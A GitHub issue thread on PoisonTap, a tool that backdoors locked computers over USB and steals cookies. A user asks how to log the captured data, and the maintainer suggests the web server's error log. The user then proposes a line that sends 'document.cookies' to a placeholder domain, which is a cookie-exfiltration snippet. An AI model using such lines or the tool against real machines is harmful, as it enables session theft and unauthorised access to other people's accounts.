samyk / poisontap

Exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js.
https://samy.pl/poisontap/
6.22k stars 994 forks source link

Logfile #107

Open jebusherr opened 7 years ago

jebusherr commented 7 years ago

Hi there,

my PoisonTap installation and everything works fine. But could someone help me with the creation of a logfile, please?

In target_backdoor.js there is a log.php mentioned, which is not included in this repo. I've already read, that this is correct and okay. But I don't know how to create such a php file on my own. Or is it possible that PoisonTab writes a logfile without this script? It should write the file on my apache2 webserver which is in the same subnet.

Thanks for your help.

samyk commented 7 years ago

Technically you could grab the data out of your server's error log.

jebusherr commented 7 years ago

Thanks for your fast response, Samy. 👍 So I just have to change the src in target_backdoor.js to: 'http://MYDOMAIN/poisontap'+document.cookies; ? And then I can grab the data out of the apache error log or which error log did you mean?